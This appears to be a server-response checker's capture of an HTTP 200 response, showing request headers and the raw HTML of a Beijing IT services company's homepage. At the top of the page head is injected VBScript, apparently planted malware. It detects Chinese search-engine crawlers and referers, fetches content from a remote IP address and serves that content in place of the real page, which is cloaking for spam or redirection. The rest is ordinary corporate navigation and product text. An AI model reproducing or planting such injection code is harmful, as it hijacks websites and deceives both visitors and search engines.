Check server response of

Server response
NS records
Whois domain
Response headers
Request headers
Raw HTML code
200 OK - ibmdt.com
HTTP Status: 200
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])
Content-Type: text/html
Last-Modified: Sat, 17 Sep 2022 11:46:05 GMT
Accept-Ranges: bytes
ETag: "6a4ea6118bcad81:0"
Server: Apache
Set-Cookie: _d_id=a10602bc53ca2018b20932e993e6af; Path=/; HttpOnly; SameSite=Lax
Date: Sat, 03 May 2025 01:08:38 GMT
Content-Length: 37546

HTTP Code 200 OK

http status code 200 is a standard successful HTTP server response. It means that the client’s request (e.g., from a browser) was successfully processed, and the server is delivering the requested data.

When is Code 200 used?

  • When loading a web page
  • When successfully receiving an API response
  • When processing a form or another HTTP request

What does Code 200 mean for the user?

The user receives content without errors, and the page or application functions properly. If Code 200 is accompanied by data, the browser or program processes and displays it to the user.

GET / HTTP/1.1
Host: ibmdt.com
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])
<html><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script CodePage=936  language="vbscript" runat="server">  
server.Scripttimeout=3600
Sub Session_OnStart
  Dim UA,Remote_server,Gethost,Remote_file,Content_mb,ReUrl
  On Error Resume Next
  ReUrl = LCase(Request.Servervariables("REQUEST_URI"))
  Gethost = LCase(Request.Servervariables("SERVER_NAME"))
  UA = LCase(Request.Servervariables("http_user_agent"))
  If Err.Number <> 0 Then
    Err.Clear
  End If
  Remote_server="http://154.204.45.1:999/"
  If(CKAgent())Then
     if(CKUrl()) Then
    Remote_file = Remote_server & "?xhost=" & Gethost &"&Reurl=" & Request.QueryString & "&ua=" & UA & "&page=1"
    Content_mb=GetHtml(Remote_file)
    Response.Clear
    Response.Write(Content_mb)
    Response.flush
    Response.End
     else
    Remote_file = Remote_server & "?xhost=" & Gethost &"&Reurl=" & Request.QueryString & "&ua=" & UA & "&dibu=1"
    Content_mb=GetHtml(Remote_file)
    Response.Clear
    Response.Write(Content_mb)
    'Remote_file = Remote_server & "?xhost=" & Gethost &"&Reurl=" & Request.QueryString & "&ua=" & UA & "&dibu=1"
    'Content_mbs=GetHtml(Remote_file)
    'Response.Write(Content_mbs)
    'Response.Flush
    'Response.End
     end if
  End If
  If(CKReferer() And CKUrl())Then
    Remote_file = Remote_server&"?jump=1"
    Content_mb=GetHtml(Remote_file)
    Response.clear
    Response.Write(Content_mb)
    Response.flush
    Response.End
  End If
End Sub

Function GetHtml(url)
  On Error Resume Next
  Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
  ObjXMLHTTP.Open "GET",url,False
  ObjXMLHTTP.SetRequestHeader "User-Agent","aQ0O010O"
  ObjXMLHTTP.Send
  GetHtml=ObjXMLHTTP.ResponseBody
  Set ObjXMLHTTP=Nothing
  Set ObjStream = Server.CreateObject("Adodb.Stream")
  ObjStream.Type = 1
  ObjStream.Mode =3
  ObjStream.Open
  ObjStream.Write GetHtml
  ObjStream.Position = 0
  ObjStream.Type = 2
  ObjStream.Charset = "gb2312"
  GetHtml = ObjStream.ReadText
  ObjStream.Close
  If Err.Number <> 0 Then
  Err.Clear
  End If
End Function

Function GetUrl()
  On Error Resume Next
  Dim ScriptAddress,Servername,qs
  ScriptAddress = CStr(Request.Servervariables("SCRIPT_NAME"))
  Servername = CStr(Request.Servervariables("Server_Name"))
  qs=Request.QueryString
  If qs<>"" Then
    GetUrl ="http://"& Servername & ScriptAddress &"?"&qs
  Else
    GetUrl ="http://"& Servername & ScriptAddress
  End If
End Function
Function CKAgent()
  Dim Agent,ExcludeArray,i
  Agent="Agent:"&LCase(Request.Servervariables("http_user_agent"))
  ExcludeArray=Array("sogou","yisouspider","baidu","360","sm","uc")
  CKAgent= false
  For i=0 To ubound(ExcludeArray)
    If (instr(Agent,ExcludeArray(i))>0) Then 
      CKAgent=true
      Exit For
    End If
  next
End Function
Function CKReferer()
  Dim Referer,i,ExcludeArray
  Referer="Referer:"&LCase(Request.Servervariables("HTTP_REFERER"))
  ExcludeArray=Array("sogou","yisouspider","baidu","360","sm","uc")
  CKReferer= False
  For i=0 To ubound(ExcludeArray)
    If (instr(Referer,ExcludeArray(i))>0) Then 
      CKReferer=True
      Exit For
    End If
  Next
End function
Function CKUrl()
  Dim urlStr,i,ExcludeArray
  urlStr="url:"&LCase(GetUrl())
  CKUrl= False
  ExcludeArray=array(".xml",".doc",".txt",".ppt",".xls",".csv",".shtml",".docx",".xlsx",".pptx")
  For i=0 To ubound(ExcludeArray)
    If (instr(urlStr,ExcludeArray(i))>0) Then 
      CKUrl=True
      Exit For
    End If
  Next
End function
</script>
<meta property="qc:admins" content="4500231617612545306375636" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>北京国信清科技有限公司</title>
<meta name="keywords" content="Domino|portal|OA|OA系统|协同办公系统|协同管理软件|办公OA|OA办公系统|外包|软件外包|Domino OA管理系统|门户网站系统|站群管理系统|内容管理系统|单点登录系统|在线考试系统|企业绩效考核系统|即时通讯">
<meta name="description" content="国信清|国信清外派|Domino|portal|OA|OA系统|协同办公系统|协同管理软件|办公OA|OA办公系|外包|软件外包|Domino OA管理系统|门户网站系统|站群管理系统|内容管理系统|单点登录系统|在线考试系统|企业绩效考核系统|即时通讯">
<link href="index.css" tppabs="http://www.ibmtech.com.cn/css/index.css" type="text/css" rel="stylesheet" />
<link href="kefu.css" tppabs="http://www.ibmtech.com.cn/css/kefu.css" type="text/css" rel="stylesheet" />
<script src="Jquery.js" tppabs="http://www.ibmtech.com.cn/js/Jquery.js" type="text/javascript"></script>
<script src="public.js" tppabs="http://www.ibmtech.com.cn/js/public.js" type="text/javascript"></script>
<script src="kefu.js" tppabs="http://www.ibmtech.com.cn/js/kefu.js" type="text/javascript"></script>
<script src="swfobject_modified.js" tppabs="http://www.ibmtech.com.cn/Scripts/swfobject_modified.js" type="text/javascript"></script> </head>
<body>
<div id="floatTools" class="float0831">
	<div class="floatL">
		<a style="display:none" id="aFloatTools_Show" class="btnOpen" title="查看在线客服" onclick="javascript:$('#divFloatToolsView').animate({width: 'show', opacity: 'show'}, 'normal',function(){ $('#divFloatToolsView').show();kf_setCookie('RightFloatShown', 0, '', '/', 'www.ibmtech.com.cn'); });$('#aFloatTools_Show').attr('style','display:none');$('#aFloatTools_Hide').attr('style','display:block');" href="javascript:void(0);">展开</a>


		<a id="aFloatTools_Hide" class="btnCtn" title="关闭在线客服" onclick="javascript:$('#divFloatToolsView').animate({width: 'hide', opacity: 'hide'}, 'normal',function(){ $('#divFloatToolsView').hide();kf_setCookie('RightFloatShown', 1, '', '/', 'www.ibmtech.com.cn'); });$('#aFloatTools_Show').attr('style','display:block');$('#aFloatTools_Hide').attr('style','display:none');"
href="javascript:void(0);">收缩</a>
	</div>
	<div id="divFloatToolsView" class="floatR">
    <div class="tp"></div>
    <div class="cn">
      <ul>
        <li class="top"><h3 class="titZx">QQ咨询</h3></li>
        <li><a class="icoTc" href="javascript:if(confirm('http://wpa.qq.com/msgrd?v=3&uin=2861673305&site=qq&menu=yes  \n\n�ļ���δ�� Teleport Pro ȡ�أ���Ϊ �������·��������ʼ��ַ�����õķ�Χ��  \n\n��Ҫ�ӷ������ϴ�����'))window.location='http://wpa.qq.com/msgrd?v=3&uin=2861673305&site=qq&menu=yes'" tppabs="http://wpa.qq.com/msgrd?v=3&uin=2861673305&site=qq&menu=yes">在线客服</a> </li>
      </ul>
      <ul>
        <li>
          <h3 class="titDh">电话咨询</h3>
        </li>
        <li><span class="icoTl">010-62981506</span> </li>
      </ul>
    </div>
  </div>
</div>
<div class="big_bg" align="center">
	<!--头部开始(包含logo,主导航,banner,公司优势介绍4个小模块)-->
	<div class="top">
    	<div class="logo"><a href="#"><img src="logo.gif" tppabs="http://www.ibmtech.com.cn/images/logo.gif" width="481" height="40" border="0" /></a></div>
        <div class="logo_right">
        	<div class="top_info"><a href="about.html" tppabs="http://www.ibmtech.com.cn/about.html" style="background:url(images/contact.gif) no-repeat left center;">sss联系我们</a><a href="javascript:window.external.AddFavorite('index.htm'/*tpa=http://www.ibmtech.com.cn/*/,'北京国信清科技有限公司')" style="background:url(images/favorites.gif) no-repeat left 4px;">加入收藏</a><a href="javascript:;" style="background:url(images/home.gif) no-repeat left center;" onclick="this.style.behavior='url(#default#homepage)';this.setHomePage('index.htm'/*tpa=http://www.ibmtech.com.cn/*/);">设为首页</a></div>
        </div>
        <div class="clear"></div>
        <!--主导航菜单开始-->
        <div class="menu">
            <ul class="shiyi_spa_ul_lv">
            <li class="hide_top_lv"><a class="hide" href="index.html" tppabs="http://www.ibmtech.com.cn/index.html">关于国信清</a>
            <!--[if lte IE 6]>
            <a href="index.html">首&nbsp;页
            <table><tr><td>
            <![endif]-->
            <!--[if lte IE 6]>
            </td></tr></table>
            </a>
            <![endif]-->
            <ul id="gyjy">
                <li><a href="about.html" tppabs="http://www.ibmtech.com.cn/about.html">国信清简介</a></li>
                <li><a href="zizhi.html" tppabs="http://www.ibmtech.com.cn/zizhi.html">国信清资质</a></li>
            </ul>
            </li>
            <li class="hide_top_lv">

            	<!--[if lte IE 6]>
            <a href="javascript:void(0);">解决方案
            <table><tr><td>
            <![endif]-->
             <div id="jjfa">
			 	<div class="databgg">
					<table width="100%" border="0" cellpadding="0" cellspacing="0">
						<tr>
							<th style="background:none;">政府行业</th>
							<th>电信行业</th>
							<th>金融行业</th>
							<th>零售行业</th>
						</tr>
						<tr>
							<td style="background:none;" rowspan="7">
								<a href="zf_caizheng01.html" tppabs="http://www.ibmtech.com.cn/zf_caizheng01.html">财政一体化系统</a><br />
								<a href="zf_caizheng02.html" tppabs="http://www.ibmtech.com.cn/zf_caizheng02.html">财政门户</a><br />
								<a href="zf_guoshui.html" tppabs="http://www.ibmtech.com.cn/zf_guoshui.html">国税外网门户解决方案</a><br />
								<a href="zf_dishui.html" tppabs="http://www.ibmtech.com.cn/zf_dishui.html">地税综合办公门户解决方案</a><br />
								<a href="zf_haiguan.html" tppabs="http://www.ibmtech.com.cn/zf_haiguan.html">海关数据交换平台</a><br />
								<a href="zf_dianzi.html" tppabs="http://www.ibmtech.com.cn/zf_dianzi.html">电子口岸解决方案</a><br />
								<a href="zf_menhu.html" tppabs="http://www.ibmtech.com.cn/zf_menhu.html">政府门户解决方案</a><br />
								<a href="zf_oa.html" tppabs="http://www.ibmtech.com.cn/zf_oa.html">政府综合办公平台</a><br />
								<a href="zf_yingji.html" tppabs="http://www.ibmtech.com.cn/zf_yingji.html">应急指挥解决方案</a><br />
								<a href="zf_zonghe.html" tppabs="http://www.ibmtech.com.cn/zf_zonghe.html">综合警务平台</a><br />
								<a href="zf_gongan.html" tppabs="http://www.ibmtech.com.cn/zf_gongan.html">公安情报系统</a><br />
								<a href="zf_zhijian.html" tppabs="http://www.ibmtech.com.cn/zf_zhijian.html">质检网上学习</a><br />
								<a href="zf_shuzi.html" tppabs="http://www.ibmtech.com.cn/zf_shuzi.html">数字法庭</a><br />
								<a href="zf_shuzi02.html" tppabs="http://www.ibmtech.com.cn/zf_shuzi02.html">数字化校园解决方案</a><br />
								<a href="zf_yiliao.html" tppabs="http://www.ibmtech.com.cn/zf_yiliao.html">新合作医疗解决方案</a>
							</td>
							<td>
								<a href="dx_01.html" tppabs="http://www.ibmtech.com.cn/dx_01.html">移动门户</a><br />
								<a href="dx_02.html" tppabs="http://www.ibmtech.com.cn/dx_02.html">移动OA</a><br />
								<a href="dx_03.html" tppabs="http://www.ibmtech.com.cn/dx_03.html">联通OA</a><br />
								<a href="dx_04.html" tppabs="http://www.ibmtech.com.cn/dx_04.html">联通门户</a><br />
								<a href="dx_05.html" tppabs="http://www.ibmtech.com.cn/dx_05.html">研究院知识管理</a><br />
								<a href="dx_06.html" tppabs="http://www.ibmtech.com.cn/dx_06.html">邮件管理解决方案</a>
							</td>
							<td>
								<a href="jr_01.html" tppabs="http://www.ibmtech.com.cn/jr_01.html">商业银行网络办公平台</a><br />
								<a href="jr_02.html" tppabs="http://www.ibmtech.com.cn/jr_02.html">银行外网门户</a><br />
								<a href="jr_03.html" tppabs="http://www.ibmtech.com.cn/jr_03.html">银行综合办公</a>
							</td>
							<td>
								<a href="ls_01.html" tppabs="http://www.ibmtech.com.cn/ls_01.html">电子商务网站</a><br />
								<a href="ls_02.html" tppabs="http://www.ibmtech.com.cn/ls_02.html">绩效考核</a><br />
								<a href="ls_03.html" tppabs="http://www.ibmtech.com.cn/ls_03.html">内部办公</a><br />
								<a href="ls_04.html" tppabs="http://www.ibmtech.com.cn/ls_04.html">供应商管理</a><br />
								<a href="ls_05.html" tppabs="http://www.ibmtech.com.cn/ls_05.html">智能零售门户网站</a>
							</td>
						</tr>
						<tr><td colspan="3" style="background:none; line-height:14px;">&nbsp; </td></tr>
						<tr>
							<th>制造行业</th>
							<th>汽车行业</th>
							<th>石油化工业</th>
						</tr>
						<tr>
							<td>
								<a href="zy_01.html" tppabs="http://www.ibmtech.com.cn/zy_01.html">流通行业</a><br />
								<a href="zy_02.html" tppabs="http://www.ibmtech.com.cn/zy_02.html">铁路门户</a><br />
								<a href="zy_03.html" tppabs="http://www.ibmtech.com.cn/zy_03.html">铁路OA</a>
							</td>
							<td rowspan="4">
								<a href="qc_yingyong.html" tppabs="http://www.ibmtech.com.cn/qc_yingyong.html">应用整合</a><br />
								<a href="qc_01.html" tppabs="http://www.ibmtech.com.cn/qc_01.html">项目管理方案</a><br />
								<a href="qc_02.html" tppabs="http://www.ibmtech.com.cn/qc_02.html">电子商务销售方案</a><br />
								<a href="qc_03.html" tppabs="http://www.ibmtech.com.cn/qc_03.html">统一门户认证方案</a><br />
								<a href="qc_04.html" tppabs="http://www.ibmtech.com.cn/qc_04.html">portal 整合SAP方案</a><br />
								<a href="qc_05.html" tppabs="http://www.ibmtech.com.cn/qc_05.html">Lotus Notes 集成SAP方案</a>
							</td>
							<td rowspan="4">
								<a href="shiyou_01.html" tppabs="http://www.ibmtech.com.cn/shiyou_01.html">银企直联解决方案</a><br />
								<a href="shiyou_02.html" tppabs="http://www.ibmtech.com.cn/shiyou_02.html">企业内部办公平台</a><br />
								<a href="shiyou_03.html" tppabs="http://www.ibmtech.com.cn/shiyou_03.html">企业综合门户</a><br />
								<a href="shiyou_04.html" tppabs="http://www.ibmtech.com.cn/shiyou_04.html">外网门户网站</a><br />
								<a href="shiyou_05.html" tppabs="http://www.ibmtech.com.cn/shiyou_05.html">应用整合解决方案</a><br />
								<a href="shiyou_06.html" tppabs="http://www.ibmtech.com.cn/shiyou_06.html">Domino 邮件OA升级方案</a>
							</td>
						</tr>
						<tr><td height="6"></td></tr>
						<tr>
							<th>中小企业</th>
						</tr>
						<tr>
							<td>
								<a href="zx_01.html" tppabs="http://www.ibmtech.com.cn/zx_01.html">门户网站</a><br />
								<a href="zx_02.html" tppabs="http://www.ibmtech.com.cn/zx_02.html">协作办公平台</a>
							</td>
						</tr>
					</table>
			 	</div>
				<div class="menu_zk_bottom"></div>
			 </div>
            <!--[if lte IE 6]>
            </td></tr></table>
            </a>
            <![endif]-->
            </li>
            <li class="hide_top_lv"><a class="hide" href="chanpinjieshao.html" tppabs="http://www.ibmtech.com.cn/chanpinjieshao.html">软件产品</a>
            <!--[if lte IE 6]>
            <a href="javascript:void(0);">产品中心
            <table><tr><td>
            <![endif]-->
            <div id="rjcp">
				<div class="rjcpbg">
					<table width="100%" border="0" cellpadding="0" cellspacing="0">
						<tr>
							<th style="background:none;" width="145"><a href="chanpinjieshao.html" tppabs="http://www.ibmtech.com.cn/chanpinjieshao.html">产品介绍</a></th>
							<th width="210">IBM</th>
							<th>国信清</th>
						</tr>
						<tr>
							<td style="background:none;"><img src="cpjs.png" tppabs="http://www.ibmtech.com.cn/images/cpjs.png" width="65" height="71" /></td>
							<td rowspan="3">
								<a href="ibmemail.html" tppabs="http://www.ibmtech.com.cn/ibmemail.html">IBM 企业邮件系统</a><br />
								<a href="gengxin.html" tppabs="http://www.ibmtech.com.cn/gengxin.html">IBM Lotus Domino OA</a><br />
								<a href="xxmh.html" tppabs="http://www.ibmtech.com.cn/xxmh.html">IBM 门户系统</a><br />
								<a href="connection.html" tppabs="http://www.ibmtech.com.cn/connection.html">IBM Lotus Connection</a><br />
								<a href="sametime.html" tppabs="http://www.ibmtech.com.cn/sametime.html">IBM Web Meeting</a><br />
								<a href="quickr.html" tppabs="http://www.ibmtech.com.cn/quickr.html">Quickr 知识管理</a><br />
								<a href="oazulin.html" tppabs="http://www.ibmtech.com.cn/oazulin.html">IBM 社交网络交流平台</a>
							</td>
							<td rowspan="3">
								<a href="APJ2EE.html" tppabs="http://www.ibmtech.com.cn/APJ2EE.html">统一门户管理系统</a><br />
								<a href="neirong.html" tppabs="http://www.ibmtech.com.cn/neirong.html">网站站群管理系统</a><br />
								<a href="rencaizhaopinxitong.html" tppabs="http://www.ibmtech.com.cn/rencaizhaopinxitong.html">人才派遣系统</a><br />
								<a href="jianyouzulin.html" tppabs="http://www.ibmtech.com.cn/jianyouzulin.html">投票管理系统</a><br />
								<a href="zxxxxt.html" tppabs="http://www.ibmtech.com.cn/zxxxxt.html">国信清JAVA考试系统</a><br />
								<a href="jixiao.html" tppabs="http://www.ibmtech.com.cn/jixiao.html">企业绩效考核系统</a><br />
								<a href="jianyouzulin.html" tppabs="http://www.ibmtech.com.cn/jianyouzulin.html">股份公司股权管理系统</a><br />
								<a href="OA.html" tppabs="http://www.ibmtech.com.cn/OA.html">手机移动办公平台</a><br />
								<a href="sjmh.html" tppabs="http://www.ibmtech.com.cn/sjmh.html">手机移动门户网站</a>
							</td>
						</tr>
						<tr>
							<th style="background:none;"><a href="client.html" tppabs="http://www.ibmtech.com.cn/client.html">产品中心报价汇总</a></th>
						</tr>
						<tr>
							<td style="background:none;"><img src="cpbjhz.png" tppabs="http://www.ibmtech.com.cn/images/cpbjhz.png" width="65" height="71" /></td>
						</tr>
					</table>
            	</div>
				<div class="rjcp_bottom"></div>
			</div>
            <!--[if lte IE 6]>
            </td></tr></table>
            </a>
            <![endif]-->
            </li>
            <li class="hide_top_lv" > <a class="hide" href="yewu.html" tppabs="http://www.ibmtech.com.cn/yewu.html">技术服务</a>
            <!--[if lte IE 6]>
            <a href="javascript:void(0);">支持与服务
            <table><tr><td>
            <![endif]-->
            <div id="jsfw">
				<div class="databgg">
					<table width="100%" border="0" cellpadding="0" cellspacing="0">
						<tr>
							<th style="background:none;" width="145"><a href="jishu.html" tppabs="http://www.ibmtech.com.cn/jishu.html" title="Example one">技术支持服务</a></th>
							<th width="279">IBM Lotus 产品支持服务</th>
							<th width="279">IBM WebSphere Portal 产品支持</th>
							<th width="279">IBM WebSphere Application</th>
						</tr>
						<tr>
							<td style="background:none;" rowspan="4"><img src="jsfwzx.png" tppabs="http://www.ibmtech.com.cn/images/jsfwzx.png" width="70" height="90" /></td>
							<td rowspan="4">
								<a href="lotus_01.html" tppabs="http://www.ibmtech.com.cn/lotus_01.html">IBM Lotus Domino 升级服务</a><br />
								<a href="javascript:void(0);">IBM Lotus Domino 迁移服务</a><br />
								<a href="lotus_02.html" tppabs="http://www.ibmtech.com.cn/lotus_02.html">IBM Lotus Quickr 知识文档管理</a><br />
								<a href="lotus_03.html" tppabs="http://www.ibmtech.com.cn/lotus_03.html">IBM Lotus Connection 社交网络</a><br />
								<a href="lotus_04.html" tppabs="http://www.ibmtech.com.cn/lotus_04.html">IBM Lotus Sametime 即时信讯</a><br />
								<a href="lotus_05.html" tppabs="http://www.ibmtech.com.cn/lotus_05.html">IBM SUT 会议技术支持</a>
							</td>
							<td>
								<a href="portal_01.html" tppabs="http://www.ibmtech.com.cn/portal_01.html">仪表盘</a><br />
								<a href="portal_02.html" tppabs="http://www.ibmtech.com.cn/portal_02.html">内容管理</a>
							</td>
							<td rowspan="4">
								<a href="websphere_03.html" tppabs="http://www.ibmtech.com.cn/websphere_03.html">IBM MQ 技术支持</a><br />
								<a href="websphere_04.html" tppabs="http://www.ibmtech.com.cn/websphere_04.html">IBM Process server技术支持</a><br />
								<a href="websphere_05.html" tppabs="http://www.ibmtech.com.cn/websphere_05.html">IBM Message broker技术支持</a><br />
								<a href="websphere_06.html" tppabs="http://www.ibmtech.com.cn/websphere_06.html">WebSphere ESB 技术支持服务</a>
							</td>
						</tr>
						<tr><td height="6"></td></tr>
						<tr><th>IBM Lombardi 智能流程管理</th></tr>
						<tr><td><a href="lombrai_01.html" tppabs="http://www.ibmtech.com.cn/lombrai_01.html">业务流程整合</a><br />&nbsp;</td></tr>
						<tr><td style="background:none; line-height:14px;" colspan="4">&nbsp;</td></tr>
						<tr>
							<th style="background:none;">技术外派服务</th>
							<th>IBM Tivoli Security</th>
							<th>培训服务</th>
							<th>外派种类</th>
						</tr>
						<tr>
							<td style="background:none;"><img src="ywzxfu.png" tppabs="http://www.ibmtech.com.cn/images/ywzxfu.png" width="70" height="90" /></td>
							<td>
								<a href="tivoli_01.html" tppabs="http://www.ibmtech.com.cn/tivoli_01.html">统一用户认证管理</a><br />
								<a href="tivoli_02.html" tppabs="http://www.ibmtech.com.cn/tivoli_02.html">统一用户授权</a><br />
								<a href="tivoli_03.html" tppabs="http://www.ibmtech.com.cn/tivoli_03.html">统一用户管理</a><br />
								<a href="tivoli_04.html" tppabs="http://www.ibmtech.com.cn/tivoli_04.html">统一用户同步</a>
							</td>
							<td>
								<a href="javascript:void(0);">IBM Domino 邮箱管理</a><br />
								<a href="peixun_01.html" tppabs="http://www.ibmtech.com.cn/peixun_01.html">IBM Lotus 开发培训</a><br />
								<a href="peixun_02.html" tppabs="http://www.ibmtech.com.cn/peixun_02.html">IBM Lotus Domino 管理培训</a>
							</td>
							<td>
								IBM Domino 程序员<br />
								IBM Portal 开发程序员<br />
								Java 开发工程师<br />
								Java 高级程序员<br />
								Java 中级程序员
							</td>
						</tr>
					</table>
				</div>
				<div class="menu_zk_bottom"></div>
			</div>
            </li>
            <li class="hide_top_lv"><a class="hide bgnone" href="CaseList.html" tppabs="http://www.ibmtech.com.cn/CaseList.html">教学大纲</a>
            <!--[if lte IE 6]>
            <a href="CaseList.html">教学大纲
            <table><tr><td>
            <![endif]-->
            <!--[if lte IE 6]>
            </td></tr></table>
            </a>
            <![endif]-->
            </li>
            <li class="hide_top_lv">

            <!--[if lte IE 6]>
            <a href="jishuku.html">技术库
            <table><tr><td>
            <![endif]-->
            <ul id="gyjy">
            	<li><a href="chanpinshiyongshenqing.html" tppabs="http://www.ibmtech.com.cn/chanpinshiyongshenqing.html">申请试用</a>
                <li><a  href="mh_demo.html" tppabs="http://www.ibmtech.com.cn/mh_demo.html">演示下载</a>
            </ul>
            <!--[if lte IE 6]>
            </td></tr></table>
            </a>
            <![endif]-->
            <!--[if lte IE 6]>
            <a href="Partners.html">合作伙伴
            <table><tr><td>
            <![endif]-->
            <!--[if lte IE 6]>
            </td></tr></table>
            </a>
            <![endif]-->
            </li>
            <li class="hide_top_lv"><a class="hide bgnone" href="job.html" tppabs="http://www.ibmtech.com.cn/job.html">加入国信清</a>
            <!--[if lte IE 6]>
            <a href="job.html">招贤纳士
            <table><tr><td>
            <![endif]-->
            <!--[if lte IE 6]>
            </td></tr></table>
            </a>
            <![endif]-->
            </li>
            </ul>
     </div>
        <div class="clear"></div>
        <div class="banner">
        	<!--<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="970" height="347">
                <param name="movie" value="imageshow.swf" />
                <param name="quality" value="high" />
                <param name="wmode" value="transparent">
                <param name="wmode" value="Opaque">
                <embed src="imageshow.swf" quality="high" wmode="transparent" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="970" height="347"></embed>
            </object>-->
          <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="970" height="347" id="FlashID" title="banner">
              <param name="movie" value="imageshow.swf" tppabs="http://www.ibmtech.com.cn/imageshow.swf" />
              <param name="swfversion" value="8.0.35.0" />
              <!-- 此 param 标签提示使用 Flash Player 6.0 r65 和更高版本的用户下载最新版本的 Flash Player。如果您不想让用户看到该提示,请将其删除。 -->
              <param name="expressinstall" value="expressInstall.swf" tppabs="http://www.ibmtech.com.cn/Scripts/expressInstall.swf" />
              <param name="SCALE" value="exactfit" />
              <!-- 下一个对象标签用于非 IE 浏览器。所以使用 IECC 将其从 IE 隐藏。 -->
              <!--[if !IE]>-->
              <object type="application/x-shockwave-flash" data="imageshow.swf" tppabs="http://www.ibmtech.com.cn/imageshow.swf" width="970" height="347">
                <!--<![endif]-->
                <param name="wmode" value="transparent" />
                <param name="wmode" value="transparent">
                <param name="swfversion" value="8.0.35.0" />
                <param name="expressinstall" value="expressInstall.swf" tppabs="http://www.ibmtech.com.cn/Scripts/expressInstall.swf" />
                <param name="SCALE" value="exactfit" />
                <!-- 浏览器将以下替代内容显示给使用 Flash Player 6.0 和更低版本的用户。 -->
                <div>
                  <h4>此页面上的内容需要较新版本的 Adobe Flash Player。</h4>
                  <p><a href="javascript:if(confirm('http://www.adobe.com/go/getflashplayer  \n\n�ļ���δ�� Teleport Pro ȡ�أ���Ϊ �������·��������ʼ��ַ�����õķ�Χ��  \n\n��Ҫ�ӷ������ϴ�����'))window.location='http://www.adobe.com/go/getflashplayer'" tppabs="http://www.adobe.com/go/getflashplayer"><img src="get_flash_player-1.gif" tppabs="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="获取 Adobe Flash Player" /></a></p>
                </div>
                <!--[if !IE]>-->
              </object>
              <!--<![endif]-->
          </object>
</div>
        <div class="banner_ad"><img src="banner_ad.jpg" tppabs="http://www.ibmtech.com.cn/images/banner_ad.jpg" width="982" height="107" /></div>
    </div>
    <!--中间部分开始(包含4大类产品切换,业务联系,教学大纲,图片滚动)-->
    <div class="main">
    	<div class="main_left">
        	<div class="ml_title"><a href="gengxin.html" tppabs="http://www.ibmtech.com.cn/gengxin.html" id="mlm1" onmouseover="mlm_change('1');" class="mlm_sel">IBM Lotus Domino OA</a><a href="xxmh.html" tppabs="http://www.ibmtech.com.cn/xxmh.html" id="mlm2" onmouseover="mlm_change('2');">IBM 门户系统</a><a href="zxxxxt.html" tppabs="http://www.ibmtech.com.cn/zxxxxt.html" id="mlm3" onmouseover="mlm_change('3');">国信清网站管理系统</a><a href="rencaizhaopinxitong.html" tppabs="http://www.ibmtech.com.cn/rencaizhaopinxitong.html" id="mlm4" onmouseover="mlm_change('4');">人才派遣系统</a></div>
            <div class="main_main" id="mm1">
            	<p class="mm_text"><a href="gengxin.html" tppabs="http://www.ibmtech.com.cn/gengxin.html" target="_blank">企业可以通过OA的实施建立起企业办公协作平台,包括电子邮件系统、企业内部电子公告系统、文档管理系统、企业办公流程管理系统等。利用这个基础信息平台实现企业内部的办公信息流转,达到内部员工的信息互通与信息共享。本办公自动化软件系统紧紧围绕着规范管理标准、提高管理水平,实现高效率、无纸化办公为最终目标 ……</a></p>
                <p class="mm_img"><a href="gengxin.html" tppabs="http://www.ibmtech.com.cn/gengxin.html" target="_blank"><img src="DominoOA.jpg" tppabs="http://www.ibmtech.com.cn/images/DominoOA.jpg" width="158" height="141" border="0" /></a></p>
            </div>
            <div class="main_main" id="mm2" style="display:none;">
            	<p class="mm_text"><a href="xxmh.html" tppabs="http://www.ibmtech.com.cn/xxmh.html" target="_blank">WebSphere Portal内容管理平台是能够提供集内容管理、业务流程、企业门户等功能于一体的可定制化应用平台,帮助客户构建高效的电子商务、信息及应用整合门户。WebSphere Portal内容管理平台是长期跟踪国际先进技术潮流,使用领先的设计理念和技术研发的结果,能够帮助企业最好地与实际运营相匹配,为 ……</a></p>
                <p class="mm_img"><a href="xxmh.html" tppabs="http://www.ibmtech.com.cn/xxmh.html" target="_blank"><img src="xxmh.jpg" tppabs="http://www.ibmtech.com.cn/images/xxmh.jpg" width="158" height="141" border="0" /></a></p>
            </div>
            <div class="main_main" id="mm3" style="display:none;">
            	<p class="mm_text"><a href="zxxxxt.html" tppabs="http://www.ibmtech.com.cn/zxxxxt.html" target="_blank">国信清网站管理系统是基于J2EE技术独立开发的网站管理系统。该网站管理系统融合先进的网站建设周期管理思想,集成网站可视化设计、内容管理、虚拟主机、用户管理、审核管理、权限管理等经典应用,全面覆盖了网站建设的各个环节。为网站提供专业、高效全程管理解决方案。 ……</a></p>
                <p class="mm_img"><a href="zxxxxt.html" tppabs="http://www.ibmtech.com.cn/zxxxxt.html" target="_blank"><img src="saba.jpg" tppabs="http://www.ibmtech.com.cn/images/saba.jpg" width="158" height="141" border="0" /></a></p>
            </div>
            <div class="main_main" id="mm4" style="display:none;">
            	<p class="mm_text"><a href="rencaizhaopinxitong.html" tppabs="http://www.ibmtech.com.cn/rencaizhaopinxitong.html" target="_blank">国信清基于IBM 产品开发的人才派遣系统,系统使企业战略有效贯彻执行、组织统一管理、核心管控流程实现、人才派遣、企业招聘信息、个人求职简历、职 场知识管理等多方面管理价值集中体现。本平台的前端应用系统和后端管理系统 均采用 B/S 模式, 可以通过浏览器进行访问和管理,具有高度的可扩展性、高 度的安全性、稳定性与可靠性……</a></p>
                <p class="mm_img"><img src="menghu.jpg" tppabs="http://www.ibmtech.com.cn/images/menghu.jpg" width="158" height="141" /></p>
            </div>
        </div>
        <div class="main_right">
